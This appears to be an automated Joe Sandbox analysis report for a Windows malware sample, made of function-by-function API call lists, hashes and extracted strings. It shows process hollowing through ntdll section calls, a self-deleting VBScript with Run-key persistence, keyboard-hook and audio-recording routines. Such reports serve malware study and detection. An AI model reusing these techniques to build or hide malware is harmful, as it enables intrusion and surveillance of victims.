                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                • Instruction Fuzzy Hash:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                • Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
                                • Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                • Instruction ID: e4f6ca204f58efd2523fb0dbef6dba8f744ce0bfcff40a2940ff04dc0a880f4e
                                • Instruction Fuzzy Hash: A841FB75A187558BC340CF29C58061BFBE1FFD8318F655A1EF889A3350D375E9428B86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                • Instruction ID: ecf94096385373c2e9f2c5c276bef480e2dc0267d4a411ba40625ecd8b408152
                                • Instruction Fuzzy Hash: 7F323831D69F014DE7239A35C862336A289BFB73C5F15D737F816B5AAAEB28C4834105
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                • Instruction ID: 709358690f7fb2d2e3012b2358c769367bf3ff6314f01af24d3ecfcd65fe7181
                                • Instruction Fuzzy Hash: 443290716087459BD715DE28C4807AAB7E1BF84318F044A3EF89587392D778DD8BCB8A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                • Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
                                • Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                • Instruction ID: 4a18c9c21abf6ab3d0e9afb34562907cd60dbb70f6b305f111ae620774dcdf5c
                                • Instruction Fuzzy Hash: 42F18C716142559FC304DF1EE89182BB3E1FB89301B450A2EF5C2C7391DB79EA16CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction ID: b3ba5b81110409d95a5723b53b6c8744913893e641e186edab39e166e1bc966b
                                • Instruction Fuzzy Hash: 7DC1B1723091930ADF2D4A3D853453FFBA15AA57B171A275FE8F2CB2C1EE18C524D524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction ID: 7f684bb0481695d58232a2b0d47c85f4cbd32b92c5f53758fc2a28b9861b6fac
                                • Instruction Fuzzy Hash: EAC1C5723092930ADF2D463D853453FFBA15AA57B171A275EE8F2CB2C5FE28C524C614
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction ID: b4bbf9256ac03f5d23606f900b1ff113549fac5ad7a5b3908127750d008d8003
                                • Instruction Fuzzy Hash: FDC1B0B230D1930ADB3D4A3D953453FBBA15AA63B171A275ED8F2CB2C1FE18C524D624
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction ID: c0cc860fb011aaa8bec1e183ca1ba44e4399d72b3d9d4532b0ef978257cdf629
                                • Instruction Fuzzy Hash: 08C1A0B230D1930ADB3D463D853853FBBA15AA67B171A276ED8F2CB2C1FE18C524D614
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                • Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
                                • Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                • Instruction ID: 9176630f27626b4b14444871c43cfb7a364794bde640040d1d9abeeee83df0d0
                                • Instruction Fuzzy Hash: E1614531602709E6EF349A2B48917BF2395AB1D304F58341BED42DB3C1D55DED428A1E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                • Instruction ID: c8a25274eb6ace22fd939f207aba0bb726f52b15d0dfb3f1b2e2615f3a586ecc
                                • Instruction Fuzzy Hash: B2619C71602609A6DA34496B8893BBF6394EB6D308F94341BE443DB3C1E61DEC43875E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                • Instruction ID: b97fed3bff06dc01e1c808345b9e1576e5435f58d5e0cb17a963d6e43aa39459
                                • Instruction Fuzzy Hash: C8516A21E01A4496DB38892964D67BF67A99B1E304F18390FE443CB7C2C64DED06C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                • Instruction ID: 96b5c22f40dc969dc1399d427f9382315b517a9523814fa291cced01a0c32d8b
                                • Instruction Fuzzy Hash: 5B617E72A083059FC304DF35D581A5FB7E5AFCC318F510E2EF499D6151EA35EA088B86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 78f0f7b5b7642c22d8ee35c169576c4e0068381375f86828a5140fd971b96714
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 9311E6BB24034143D6088A2DCCB85B7E797EADD321F7D626FF0424B758DB2AA9459608
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,Pj,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$wend$while fso.FileExists("
                                • API String ID: 1861856835-2780701618
                                • Opcode ID: 3636752152bf25bba4ed1af56f8eb063c4a7c092bf6ba356f7e6c0dd9e632a49
                                • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                • Opcode Fuzzy Hash: 3636752152bf25bba4ed1af56f8eb063c4a7c092bf6ba356f7e6c0dd9e632a49
                                • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                • ResumeThread.KERNEL32(?), ref: 00418435
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                • GetLastError.KERNEL32 ref: 0041847A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 4188446516-3035715614
                                • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                • API String ID: 2649220323-436679193
                                • Opcode ID: 9ecf8f8d4c70b580fdd2dc0aff552b5be433a566aa934f8f3456794d39b6c919
                                • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                • Opcode Fuzzy Hash: 9ecf8f8d4c70b580fdd2dc0aff552b5be433a566aa934f8f3456794d39b6c919
                                • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                • SetEvent.KERNEL32 ref: 0041B219
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                • CloseHandle.KERNEL32 ref: 0041B23A
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                • API String ID: 738084811-2094122233
                                • Opcode ID: 9c1406b7fe5af7018f68ccb5b24fb03548191950d6e0523ed5e8582fc8778fdf
                                • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                • Opcode Fuzzy Hash: 9c1406b7fe5af7018f68ccb5b24fb03548191950d6e0523ed5e8582fc8778fdf
                                • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
